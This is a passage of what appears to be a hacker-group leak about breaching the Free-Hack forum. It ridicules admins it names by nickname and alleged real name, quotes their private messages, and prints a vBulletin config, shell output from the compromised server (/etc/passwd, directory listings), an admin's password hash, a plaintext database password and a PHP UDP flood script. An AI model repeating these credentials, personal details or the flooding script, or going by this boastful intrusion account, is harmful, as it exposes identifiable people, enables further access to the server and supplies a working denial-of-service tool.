  4192. $config['SlaveServer']['password'] = '';
  4193. $config['SlaveServer']['usepconnect'] = 0;
  4194.  
  4195.  
  4196.  
  4197.  // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
  4198.  // This setting allows you to change the name of the folders that the admin and
  4199.  // moderator control panels reside in. You may wish to do this for security purposes.
  4200.  // Please note that if you change the name of the directory here, you will still need
  4201.  // to manually change the name of the directory on the server.
  4202. $config['Misc']['admincpdir'] = 'admincphaha';
  4203. $config['Misc']['modcpdir'] = 'modcphaha';
  4204.  
  4205.  // Prefix that all vBulletin cookies will have
  4206.  // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
  4207. $config['Misc']['cookieprefix'] = 'bb';
  4208.  
  4209.  // ******** FULL PATH TO FORUMS DIRECTORY ******
  4210.  // On a few systems it may be necessary to input the full path to your forums directory
  4211.  // for vBulletin to function normally. You can ignore this setting unless vBulletin
  4212.  // tells you to fill this in. Do not include a trailing slash!
  4213.  // Example Unix:
  4214.  //   $config['Misc']['forumpath'] = '/home/users/public_html/forums';
  4215.  // Example Win32:
  4216.  //   $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
  4217. $config['Misc']['forumpath'] = '';
  4218.  
  4219.  
  4220.  
  4221.  // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
  4222.  // The users specified here will be allowed to view the admin log in the control panel.
  4223.  // Users must be specified by *ID number* here. To obtain a user's ID number,
  4224.  // view their profile via the control panel. If this is a new installation, leave
  4225.  // the first user created will have a user ID of 1. Seperate each userid with a comma.
  4226. $config['SpecialUsers']['canviewadminlog'] = '1';
  4227.  
  4228.  // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
  4229.  // The users specified here will be allowed to remove ("prune") entries from the admin
  4230.  // log. See the above entry for more information on the format.
  4231. $config['SpecialUsers']['canpruneadminlog'] = '1';
  4232.  
  4233.  // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
  4234.  // The users specified here will be allowed to run queries from the control panel.
  4235.  // See the above entries for more information on the format.
  4236.  // Please note that the ability to run queries is quite powerful. You may wish
  4237.  // to remove all user IDs from this list for security reasons.
  4238. $config['SpecialUsers']['canrunqueries'] = '';
  4239.  
  4240.  // ****** UNDELETABLE / UNALTERABLE USERS ******
  4241.  // The users specified here will not be deletable or alterable from the control panel by any users.
  4242.  // To specify more than one user, separate userids with commas.
  4243. $config['SpecialUsers']['undeletableusers'] = '';
  4244.  
  4245.  // ****** SUPER ADMINISTRATORS ******
  4246.  // The users specified below will have permission to access the administrator permissions
  4247.  // page, which controls the permissions of other administrators
  4248. $config['SpecialUsers']['superadministrators'] = '1,2';
  4249.  
  4250.  // ****** DATASTORE CACHE CONFIGURATION *****
  4251.  // Here you can configure different methods for caching datastore items.
  4252.  // vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
  4253.  // vB_Datastore_APC - to use APC
  4254.  // vB_Datastore_XCache - to use XCache
  4255.  // vB_Datastore_Memcached - to use a Memcache server, more configuration below
  4256. // $config['Datastore']['class'] = 'vB_Datastore_Filecache';
  4257.  
  4258.  // ******** DATASTORE PREFIX ******
  4259.  // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
  4260.  // than one set of forums installed on your host, you *may* need to use a prefix
  4261.  // so that they do not try to use the same variable within the cache.
  4262.  // This works in a similar manner to the database table prefix.
  4263. // $config['Datastore']['prefix'] = '';
  4264.  
  4265.  // It is also necessary to specify the hostname or IP address and the port the server is listening on
  4266. /*
  4267. $config['Datastore']['class'] = 'vB_Datastore_Memcached';
  4268. $i = 0;
  4269. // First Server
  4270. $i++;
  4271. $config['Misc']['memcacheserver'][$i]   = '127.0.0.1';
  4272. $config['Misc']['memcacheport'][$i]      = 11211;
  4273. $config['Misc']['memcachepersistent'][$i] = true;
  4274. $config['Misc']['memcacheweight'][$i]   = 1;
  4275. $config['Misc']['memcachetimeout'][$i]   = 1;
  4276. $config['Misc']['memcacheretry_interval'][$i] = 15;
  4277. */
  4278.  
  4279. // ****** The following options are only needed in special cases ******
  4280.  
  4281.  // ****** MySQLI OPTIONS *****
  4282.  // When using MySQL 4.1+, MySQLi should be used to connect to the database.
  4283.  // If you need to set the default connection charset because your database
  4284.  // is using a charset other than latin1, you can set the charset here.
  4285.  // If you don't set the charset to be the same as your database, you
  4286.  // may receive collation errors.  Ignore this setting unless you
  4287.  // are sure you need to use it.
  4288. // $config['Mysqli']['charset'] = 'utf8';
  4289.  
  4290.  // Optionally, PHP can be instructed to set connection parameters by reading from the
  4291.  // file named in 'ini_file'. Please use a full path to the file.
  4292.  // Example:
  4293.  // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
  4294. $config['Mysqli']['ini_file'] = '';
  4295.  
  4296. // Image Processing Options
  4297.  // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
  4298. $config['Misc']['maxwidth'] = 2592;
  4299. $config['Misc']['maxheight'] = 1944;
  4300.  
  4301. /*======================================================================*\
  4302. || ####################################################################
  4303. || # Downloaded: 22:25, Sat Jan 9th 2010
  4304. || # CVS: $RCSfile$ - $Revision: 32878 $
  4305. || ####################################################################
  4306. \*======================================================================*/
  4307.  
  4308.  
  4309.  ____________________________________________________|_._._._._._._._,
  4310.  \___________________________________________________|_|_|_|_|_|_|_|_|
  4311.                                                      ! ~ free-hack ~  
  4312.                                                                      
  4313. Many people will wonder why we owned  Free-Hack  because  they  always
  4314. claimed to have nothing to do with fraud and stuff. In  fact  this  is
  4315. the second time we owned them but the first time  we  go  public.  The
  4316. first time was a few months ago in order to check out what  they  were
  4317. doing in their internal eleet priv8 sections.  To  our  surprise  they
  4318. really had nothing to do with fraud.  Still,  they  are  part  of  the
  4319. problem we call the skiddy breeding of lameness.                      
  4320.                                                                      
  4321. Actually, there are a few communities where you can find a few skilled
  4322. members. Free-Hack is a forum where you can find  two  or  three.  The
  4323. rest are simple skidi0ts who have no right to even exist, let alone be
  4324. on our internet. Also  the  admins,  particularly  "Suicide"  aka  Mr.
  4325. Stefan Finke or  "enco"  aka  Mr.  Enrico  Costanzo  are  nothing  but
  4326. arrogant asshats who's only apparent  talent  appears  to  be  banning
  4327. people. Oh wait, "Suicide" actually HAS skill. Like  he  mastered  the
  4328. usage of Hydra and is now able to hax every Teamspeak  server.  Ph33r.
  4329. Don't get us wrong; J0hn.X3r, a newer admin, is actually a pretty good
  4330. guy, who had the right spirit and was willing to  learn.  But  getting
  4331. promoted to admin in a "hacker" community with ~40k users which has an
  4332. "expert" zone for "skilled" members who talk about how to  bypass  the
  4333. Webspell SQL Injection filter is the worst thing he could have done...
  4334.                                                                      
  4335.  ____________________________________________________________________
  4336. |                         __          __                             |
  4337. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  4338. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  4339. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  4340. |________|__|________________________________________________________|
  4341. |                                                                    |
  4342. | Suicide:                                                           |
  4343. | Mir fehlt der Stress, das Adrenalin, der Hass den man auf und      |
  4344. | wegen einigen Usern bekommen hat. In den fünf Jahren gab es so     |
  4345. | viel Ärger (Fettemama, Hacksector, CIA-World, Grey-Hats,           |
  4346. | Black-Hats, Mbk, Speedtest). Wieso will sich niemand mehr mit      |
  4347. | uns anlegen?                                                       |
  4348. |____________________________________________________________________|
  4349.                                                                      
  4350. You can have that. There's quite alot of hilarity left in the database
  4351. backups we prepared. Do not forget to have a  look  for  yourself.  We
  4352. especially liked that guy who trolled  fred777  by  logging  into  his
  4353. account:                                                              
  4354.                                                                      
  4355.  ____________________________________________________________________
  4356. |                         __          __                             |
  4357. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  4358. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  4359. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  4360. |________|__|________________________________________________________|
  4361. |                                                                    |
  4362. |  PM from fred777 to enco:                                          |
  4363. |  Hallo,                                                            |
  4364. |                                                                    |
  4365. |  bitte meinen Namen auf "Wurstkoenig" ändern. Vielen Dank          |
  4366. |                                                                    |
  4367. |  fred777                                                           |
  4368. |____________________________________________________________________|
  4369.                                                                      
  4370. That one really worked. GG mate!                                      
  4371.                                                                      
  4372.  ____________________________________________________________________
  4373. |                         __          __                             |
  4374. |     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
  4375. |     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
  4376. |     |__   |_____|_____||____|_____||_____|_____|__.__|             |
  4377. |________|__|________________________________________________________|
  4378. |                                                                    |
  4379. | Suicide:                                                           |
  4380. | Warum überhaupt umziehen? Der neue Server hat ungefähr die         |
  4381. | gleichen Attribute wie der Jetzige. Dazu wird die Firewall um das  |
  4382. | doppelte verstärkt. Im Gesamtpaket komme ich da besser weg, als in |
  4383. | der momentanen Situation.                                          |
  4384. |____________________________________________________________________|
  4385.                                                                      
  4386. Wut? What Firewall? We didn't see no stinking firewall. Owait it's us.
  4387. Too ninja again.                                                      
  4388.  
  4389. $ uname -a
  4390. Linux server1.free-hack.com 2.6.18-194.17.1.el5.028stab070.7 #1 SMP Fri Oct 1 14:17:14 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
  4391.  
  4392. $ id
  4393. uid=508(freehack) gid=504(freehack) groups=504(freehack)
  4394.  
  4395. $ cat /etc/passwd
  4396. root:x:0:0:root:/root:/bin/bash
  4397. bin:x:1:1:bin:/bin:/sbin/nologin
  4398. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  4399. adm:x:3:4:adm:/var/adm:/sbin/nologin
  4400. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  4401. sync:x:5:0:sync:/sbin:/bin/sync
  4402. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  4403. halt:x:7:0:halt:/sbin:/sbin/halt
  4404. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  4405. news:x:9:13:news:/etc/news:
  4406. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  4407. operator:x:11:0:operator:/root:/sbin/nologin
  4408. games:x:12:100:games:/usr/games:/sbin/nologin
  4409. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  4410. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  4411. nobody:x:99:99:Nobody:/:/sbin/nologin
  4412. rpm:x:37:37::/var/lib/rpm:/sbin/nologin
  4413. dbus:x:81:81:System message bus:/:/sbin/nologin
  4414. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  4415. named:x:25:25:Named:/var/named:/sbin/nologin
  4416. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  4417. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  4418. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  4419. rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
  4420. apache:x:48:48:Apache:/var/www:/sbin/nologin
  4421. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  4422. pcap:x:77:77::/var/arpwatch:/sbin/nologin
  4423. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  4424. cpanel:x:32001:32001::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
  4425. cpanelhorde:x:32002:32002::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
  4426. cpanelphpmyadmin:x:32003:32003::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
  4427. cpanelphppgadmin:x:32004:32004::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
  4428. cpanelroundcube:x:32005:32005::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
  4429. xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
  4430. mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
  4431. mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
  4432. dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
  4433. freehack:x:508:504::/home/freehack:/usr/local/cpanel/bin/jailshell
  4434. ntp:x:38:38::/etc/ntp:/sbin/nologin
  4435. lsadm:x:101:32009::/:/sbin/nologin
  4436.  
  4437.  
  4438. $ ls -la /
  4439. total 108
  4440. drwxr-xr-x  24 root root  4096 Nov 30 02:12 .
  4441. drwxr-xr-x  24 root root  4096 Nov 30 02:12 ..
  4442. -rw-r--r--   1 root root     0 Nov 30 02:12 .autofsck
  4443. -rw-r--r--   1 root root     0 Jan 17  2009 .autorelabel
  4444. drwx------   2 root  500  4096 Nov 11 18:43 .spamassassin
  4445. lrwxrwxrwx   1 root root    39 Nov 30 02:12 aquota.group -> /proc/vz/vzaquota/00000045/aquota.group
  4446. lrwxrwxrwx   1 root root    38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user
  4447. drwx--x--x   3 root root  4096 Nov 13 09:00 backup
  4448. drwxr-xr-x   2 root root  4096 Nov 17 00:24 bin
  4449. drwxr-xr-x   2 root root  4096 Jan 26  2010 boot
  4450. drwxr-xr-x   7 root root  1900 Nov 30 02:12 dev
  4451. drwxr-xr-x  68 root root 12288 Dec  8 21:35 etc
  4452. drwx--x--x   8 root root  4096 Nov 14 07:11 home
  4453. drwxr-xr-x   9 root root  4096 Nov 12 08:24 lib
  4454. drwxr-xr-x   7 root root  4096 Nov 12 08:24 lib64
  4455. drwxr-xr-x   2 root root  4096 Jan 26  2010 media
  4456. drwxr-xr-x   2 root root  4096 Jan 26  2010 mnt
  4457. drwxr-xr-x  10 root root  4096 Nov 12 16:31 opt
  4458. dr-xr-xr-x 113 root root     0 Nov 30 02:12 proc
  4459. drwxr-x---  14 root root  4096 Dec  8 21:36 root
  4460. drwxr-xr-x   2 root root  4096 Nov 17 00:24 sbin
  4461. drwxr-xr-x   5 root root 20480 Dec  8 00:24 scripts
  4462. drwxr-xr-x   2 root root  4096 Jan 26  2010 selinux
  4463. drwxr-xr-x   2 root root  4096 Jan 26  2010 srv
  4464. drwxr-xr-x   3 root root     0 Nov 30 02:12 sys
  4465. drwxrwxrwt  10 root root  4096 Dec  8 21:36 tmp
  4466. drwxr-xr-x  16 root root  4096 Nov 11 18:17 usr
  4467. drwxr-xr-x  22 root root  4096 Nov 11 18:01 var
  4468.  
  4469. $ ls -la /home/freehack/public_html
  4470. total 3100
  4471. drwxr-x--- 34 freehack nobody     4096 Dec  4 22:13 .
  4472. drwx--x--x 14 freehack freehack   4096 Dec  7 11:15 ..
  4473. -rw-r--r--  1 freehack freehack   1086 Dec  4 22:27 .htaccess
  4474. drwxr-xr-x 11 freehack freehack   4096 Nov 14 09:24 2tgh9322132k322l1sd
  4475. -rw-r--r--  1 freehack freehack   6726 Jan 18  2010 LICENSE
  4476. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _private
  4477. drwxr-xr-x  4 freehack freehack   4096 Nov 14 08:28 _vti_bin
  4478. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_cnf
  4479. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_log
  4480. drwxr-x---  2 freehack nobody     4096 Nov 14 07:11 _vti_pvt
  4481. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 _vti_txt
  4482. -rw-r--r--  1 freehack freehack  19341 Jan 18  2010 accessmask.php
  4483. -rw-r--r--  1 freehack freehack  12687 Jan 18  2010 admin_rbs.php
  4484. -rw-r--r--  1 freehack freehack   2645 Jan 18  2010 admin_rbs_banner_list.php
  4485. -rw-r--r--  1 freehack freehack   3089 Jan 18  2010 admin_rbs_convert.php
  4486. -rw-r--r--  1 freehack freehack   2667 Jan 18  2010 admin_rbs_d_banner_list.php
  4487. -rw-r--r--  1 freehack freehack   2668 Jan 18  2010 admin_rbs_h_banner_list.php
  4488. -rw-r--r--  1 freehack freehack   2668 Jan 18  2010 admin_rbs_v_banner_list.php
  4489. -rw-r--r--  1 freehack freehack   2681 Jan 18  2010 admin_rbs_x_banner_list.php
  4490. -rw-r--r--  1 freehack freehack  39582 Jan 18  2010 admincalendar.php
  4491. -rw-r--r--  1 freehack freehack  49644 Jan 18  2010 admininfraction.php
  4492. -rw-r--r--  1 freehack freehack  19150 Jan 18  2010 adminlog.php
  4493. -rw-r--r--  1 freehack freehack   8149 Jan 18  2010 adminpermissions.php
  4494. -rw-r--r--  1 freehack freehack  25516 Jan 18  2010 adminreputation.php
  4495. -rw-r--r--  1 freehack freehack   1230 Jan 18  2010 ads.php
  4496. -rw-r--r--  1 freehack freehack  23844 Jan 18  2010 ajax.php
  4497. -rw-r--r--  1 freehack freehack  75511 Jan 18  2010 album.php
  4498. drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:04 amecache
  4499. -rw-r--r--  1 freehack freehack  17137 Jan 18  2010 announcement.php
  4500. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:04 archive
  4501. -rw-r--r--  1 freehack freehack  18309 Jan 18  2010 attachment.php
  4502. -rw-r--r--  1 freehack freehack  12512 Jan 18  2010 attachmentpermission.php
  4503. -rw-r--r--  1 freehack freehack  80983 Jan 18  2010 automediaembed_admin.php
  4504. -rw-r--r--  1 freehack freehack   1979 Jan 18  2010 autorefresh_footer.php
  4505. -rw-r--r--  1 freehack freehack   1979 Jan 18  2010 autorefresh_header.php
  4506. -rw-r--r--  1 freehack freehack   1991 Jan 18  2010 autorefresh_navbar.php
  4507. -rw-r--r--  1 freehack freehack   1430 Jan 18  2010 autotagger_ajax.php
  4508. -rw-r--r--  1 freehack freehack  19355 Jan 18  2010 avatar.php
  4509. -rw-r--r--  1 freehack freehack  46771 Jan 18  2010 banner.png
  4510. -rw-r--r--  1 freehack freehack  16461 Jan 18  2010 bbcode.php
  4511. drwxr-xr-x  6 freehack freehack   4096 Nov 14 08:06 bilder
  4512. drwxr-xr-x  8 freehack freehack   4096 Nov 25 14:18 blog
  4513. -rw-r--r--  1 freehack freehack  14782 Jan 18  2010 bookmarksite.php
  4514. -rw-r--r--  1 freehack freehack  75327 Jan 18  2010 calendar.php
  4515. -rw-r--r--  1 freehack freehack  12083 Jan 18  2010 calendarpermission.php
  4516. drwxr-xr-x  2 freehack freehack   4096 Nov 14 07:11 cgi-bin
  4517. -rw-r--r--  1 freehack freehack     43 Jan 18  2010 clear.gif
  4518. drwxr-xr-x  4 freehack freehack   4096 Nov 14 08:08 clientscript
  4519. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:08 control_examples
  4520. -rw-r--r--  1 freehack freehack  14938 Jan 18  2010 converse.php
  4521. drwxr-xr-x  3 freehack freehack   4096 Nov 18 14:14 cpa
  4522. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:11 cpm
  4523. drwxr-xr-x  7 freehack freehack   4096 Nov 14 08:12 cpstyles
  4524. -rw-r--r--  1 freehack freehack   3317 Jan 18  2010 cron.php
  4525. -rw-r--r--  1 freehack freehack  24049 Jan 18  2010 cronadmin.php
  4526. -rw-r--r--  1 freehack freehack  10734 Jan 18  2010 cronlog.php
  4527. -rw-r--r--  1 freehack freehack  34087 Jan 18  2010 css.php
  4528. drwxrwxrwx  3 freehack freehack   4096 Nov 14 08:13 customavatars
  4529. drwxrwxrwx  3 freehack freehack   4096 Nov 14 08:13 customgroupicons
  4530. drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:13 customprofilepics
  4531. -rw-r--r--  1 freehack freehack  21833 Jan 18  2010 diagnostic.php
  4532. -rw-r--r--  1 freehack freehack  47757 Jan 18  2010 editpost.php
  4533. -rw-r--r--  1 freehack freehack  11748 Jan 18  2010 email.php
  4534. -rw-r--r--  1 freehack freehack  29500 Jan 18  2010 external.php
  4535. -rw-r--r--  1 freehack freehack   9786 Jan 18  2010 faq.php
  4536. -rw-r--r--  1 freehack freehack  22486 Jan 18  2010 favicon.ico
  4537. -rw-r--r--  1 freehack freehack  30137 Jan 18  2010 forum.php
  4538. -rw-r--r--  1 freehack freehack  35658 Jan 18  2010 forumdisplay.php
  4539. -rw-r--r--  1 freehack freehack  30063 Jan 18  2010 forumpermission.php
  4540. -rw-r--r--  1 freehack freehack  15499 Oct 11 10:03 gla_test.php
  4541. -rw-r--r--  1 freehack freehack  39830 Jan 18  2010 global.php
  4542. -rw-r--r--  1 freehack freehack     53 Oct 24 14:48 googlef4001cc5b1db090b.html
  4543. -rw-r--r--  1 freehack freehack 137885 Jan 18  2010 group.php
  4544. -rw-r--r--  1 freehack freehack  24919 Jan 18  2010 group_inlinemod.php
  4545. -rw-r--r--  1 freehack freehack  10524 Jan 18  2010 groupsubscription.php
  4546. -rw-r--r--  1 freehack freehack  25922 Jan 18  2010 help.php
  4547. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:13 htaccess
  4548. -rw-r--r--  1 freehack freehack   9047 Jan 18  2010 image.php
  4549. drwxr-xr-x 20 freehack freehack   4096 Nov 14 08:51 images
  4550. drwxr-xr-x  5 freehack freehack   4096 Nov 14 08:52 img
  4551. drwxr-xr-x  7 freehack freehack  12288 Dec  4 22:09 includes
  4552. -rw-r--r--  1 freehack freehack  19592 Jan 18  2010 index.php
  4553. -rw-r--r--  1 freehack freehack  43829 Jan 18  2010 infraction.php
  4554. -rw-r--r--  1 freehack freehack 182759 Jan 18  2010 inlinemod.php
  4555. -rw-r--r--  1 freehack freehack  10342 Jan 18  2010 joinrequests.php
  4556. -rw-r--r--  1 freehack freehack  10222 Jan 18  2010 login.php
  4557. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:59 madp
  4558. -rw-r--r--  1 freehack freehack  17066 Jan 18  2010 member.php
  4559. -rw-r--r--  1 freehack freehack  15931 Jan 18  2010 member_inlinemod.php
  4560. -rw-r--r--  1 freehack freehack  35901 Jan 18  2010 memberlist.php
  4561. -rw-r--r--  1 freehack freehack  23867 Jan 18  2010 misc.php
  4562. -rw-r--r--  1 freehack freehack  63331 Jan 18  2010 moderation.php
  4563. -rw-r--r--  1 freehack freehack   6756 Jan 18  2010 moderator.php
  4564. -rw-r--r--  1 freehack freehack  18477 Jan 18  2010 newattachment.php
  4565. -rw-r--r--  1 freehack freehack  37104 Jan 18  2010 newreply.php
  4566. -rw-r--r--  1 freehack freehack  18911 Jan 18  2010 newthread.php
  4567. -rw-r--r--  1 freehack freehack   5725 Jan 18  2010 nex_stats_tend_classes.php
  4568. drwxr-xr-x  9 freehack freehack   4096 Nov 25 18:38 nopaste
  4569. -rw-r--r--  1 freehack freehack  12095 Jul 20 15:01 oks.png
  4570. -rw-r--r--  1 freehack freehack  19604 Jan 18  2010 online.php
  4571. -rw-r--r--  1 freehack freehack   7696 Jan 18  2010 payment_gateway.php
  4572. -rw-r--r--  1 freehack freehack  11910 Jan 18  2010 payments.php
  4573. -rw-r--r--  1 freehack freehack   7889 Jan 18  2010 picture.php
  4574. -rw-r--r--  1 freehack freehack  22040 Jan 18  2010 picture_inlinemod.php
  4575. -rw-r--r--  1 freehack freehack  25311 Jan 18  2010 picturecomment.php
  4576. -rw-r--r--  1 freehack freehack  27415 Jan 18  2010 poll.php
  4577. -rw-r--r--  1 freehack freehack  17744 Jan 18  2010 post_thanks.php
  4578. -rw-r--r--  1 freehack freehack   9512 Jan 18  2010 posthistory.php
  4579. -rw-r--r--  1 freehack freehack  74369 Jan 18  2010 postings.php
  4580. -rw-r--r--  1 freehack freehack   4763 Jan 18  2010 pprm.php
  4581. -rw-r--r--  1 freehack freehack   6594 Jan 18  2010 printthread.php
  4582. -rw-r--r--  1 freehack freehack  70748 Jan 18  2010 private.php
  4583. -rw-r--r--  1 freehack freehack 152336 Jan 18  2010 profile.php
  4584. -rw-r--r--  1 freehack freehack   2712 Feb  3  2010 rbs_banner.php
  4585. -rw-r--r--  1 freehack freehack  39751 Jan 18  2010 register.php
  4586. -rw-r--r--  1 freehack freehack   5688 Jan 18  2010 report.php
  4587. -rw-r--r--  1 freehack freehack  13720 Jan 18  2010 reputation.php
  4588. -rw-r--r--  1 freehack freehack 124717 Jan 18  2010 search.php
  4589. -rw-r--r--  1 freehack freehack  20694 Jan 18  2010 sendmessage.php
  4590. -rw-r--r--  1 freehack freehack  10009 Jan 18  2010 showgroups.php
  4591. -rw-r--r--  1 freehack freehack  11374 Jan 18  2010 showpost.php
  4592. -rw-r--r--  1 freehack freehack  73470 Jan 18  2010 showthread.php
  4593. drwxrwxrwx  2 freehack freehack   4096 Nov 14 08:59 signaturepics
  4594. drwxr-xr-x  2 freehack freehack   4096 Nov 14 08:59 sitemap
  4595. -rw-r--r--  1 freehack freehack  32848 Jan 18  2010 subscription.php
  4596. -rw-r--r--  1 freehack freehack  51471 Sep 11 14:10 support.php
  4597. -rw-r--r--  1 freehack freehack  13365 Jan 18  2010 tags.php
  4598. -rw-r--r--  1 freehack freehack   8692 Jan 18  2010 threadrate.php
  4599. -rw-r--r--  1 freehack freehack  12415 Jan 18  2010 threadtag.php
  4600. drwxrwxrwx  2 freehack freehack   4096 Dec  8 03:30 tmp
  4601. -rw-r--r--  1 freehack freehack  34512 Jan 18  2010 usercp.php
  4602. -rw-r--r--  1 freehack freehack  19098 Jan 18  2010 usernote.php
  4603. drwxrwxrwx  7 freehack freehack   4096 Nov 14 09:06 vboptimise
  4604. drwxr-xr-x  4 freehack freehack   4096 Dec  4 22:11 vbseo
  4605. -rw-r--r--  1 freehack freehack  45172 Sep 14 01:00 vbseo.php
  4606. drwxr-xr-x  4 freehack freehack   4096 Nov 14 09:14 vbseo_sitemap
  4607. -rw-r--r--  1 freehack freehack   4221 Sep 14 01:00 vbseocp.php
  4608. -rw-r--r--  1 freehack freehack  27357 Jan 18  2010 visitormessage.php
  4609. -rw-r--r--  1 freehack freehack   8431 Jan 18  2010 whoquotedme.php
  4610. -rw-r--r--  1 freehack freehack    334 Oct  7 11:32 x.php
  4611.  
  4612.  
  4613. RETARDED PHP CODE ALERT!
  4614.  
  4615. $ cat x.php
  4616. <?
  4617. if(!$_GET['target'])
  4618. {
  4619.     die('no target ip specified!');
  4620. }
  4621. $target = $_GET['t'];
  4622.  
  4623. $sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);
  4624.  
  4625. if(!$sock) die(__LINE__);
  4626.  
  4627. $data='';
  4628. for($i=0;$i<1400;$i++)
  4629. {
  4630.   $data.=chr(rand(0,255));
  4631. }
  4632.  
  4633. while(true)
  4634. {
  4635.   if(!socket_sendto($sock,$data,strlen($data),0,$target,9)) die(__LINE__);
  4636. echo('.');
  4637. }
  4638.  
  4639. ?>
  4640.  
  4641.  
  4642.  
  4643. $ cd 2tgh9322132k322l1sd
  4644.  
  4645. $ ls
  4646. total 252
  4647. drwxr-xr-x 11 508 504  4096 Nov 14 09:24 .
  4648. drwxr-x--- 34 508  99  4096 Dec  4 22:13 ..
  4649. -rw-r--r--  1 508 504   129 Nov 14 09:24 .htaccess
  4650. -rw-r--r--  1 508 504    42 Nov 14 09:24 .htpasswd
  4651. drwxr-xr-x  2 508 504  4096 Nov 14 07:22 ReadMe
  4652. -rw-r--r--  1 508 504  3661 Nov 14 09:20 config.php
  4653. -rw-r--r--  1 508 504 58442 Sep 22  2009 config_overview.php
  4654. drwxr-xr-x  4 508 504  4096 Nov 14 07:16 css
  4655. -rw-r--r--  1 508 504 19372 Sep 22  2009 dump.php
  4656. -rw-r--r--  1 508 504   512 Nov 14 09:20 error_log
  4657. -rw-r--r--  1 508 504 22059 Sep 22  2009 filemanagement.php
  4658. -rw-r--r--  1 508 504   640 Sep 22  2009 help.php
  4659. drwxr-xr-x  2 508 504  4096 Nov 14 07:17 images
  4660. drwxr-xr-x  4 508 504  4096 Nov 14 07:18 inc
  4661. -rw-r--r--  1 508 504   871 Sep 22  2009 index.php
  4662. -rw-r--r--  1 508 504 24781 Sep 22  2009 install.php
  4663. drwxr-xr-x  4 508 504  4096 Nov 14 07:18 js
  4664. drwxr-xr-x 17 508 504  4096 Nov 14 07:22 language
  4665. -rw-r--r--  1 508 504  5461 Sep 22  2009 log.php
  4666. -rw-r--r--  1 508 504  1256 Sep 22  2009 main.php
  4667. -rw-r--r--  1 508 504  3930 Sep 22  2009 menu.php
  4668. drwxr-xr-x  2 508 504  4096 Nov 14 07:22 msd_cron
  4669. -rw-r--r--  1 508 504   776 Sep 22  2009 refresh_dblist.php
  4670. -rw-r--r--  1 508 504 15762 Sep 22  2009 restore.php
  4671. -rw-r--r--  1 508 504 10187 Sep 22  2009 sql.php
  4672. drwxr-xr-x  5 508 504  4096 Nov 14 07:22 tpl
  4673. drwxrwxrwx  5 508 504  4096 Nov 14 09:20 work
  4674.  
  4675. $ cat .htpasswd
  4676. Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1
  4677.  
  4678. $ cat config.php
  4679. <?php
  4680. // MySQL Dumper Configuration
  4681.  
  4682. // Host-Adress, default 'localhost'
  4683. $config['dbhost'] = 'localhost';
  4684. // port - if empty, mysql uses default
  4685. $config['dbport'] = '';
  4686. // socket - if empty, mysql uses default
  4687. $config['dbsocket'] = '';
  4688.  
  4689. // Username
  4690. $config['dbuser'] = 'freehack';
  4691. //User-Pass. For no Password leave empty
  4692. $config['dbpass'] = '7qm#2nwAc$oU';
  4693.  
  4694. //Speed Values between 50 and 1000000
  4695. //use low values if you have bad connection or slow machines
  4696. $config['minspeed']=100;
  4697. $config['maxspeed']=50000;
  4698.  
  4699. // Interface language and style
  4700. $config['language']='en';
  4701. $config['theme']='msd';
  4702.  
  4703. //Shows the Serveradress if 1
